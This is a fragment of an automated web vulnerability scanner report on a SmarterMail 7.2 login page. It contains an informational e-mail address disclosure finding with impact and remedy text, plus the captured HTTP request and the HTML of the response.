<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">

<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">

</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">

<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>

</div>
<div class="LoginButtons">

<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>


<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>



</div>



<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /Main/frmStoredFiles.aspx

/Main/frmStoredFiles.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx

Found E-mails

user@example.com

Request

GET /Main/frmStoredFiles.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:54:12 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=z1vggi45q5zueh45bhxlte55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3325
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">

<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">

</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">

<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>

</div>
<div class="LoginButtons">

<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>


<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>



</div>



<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>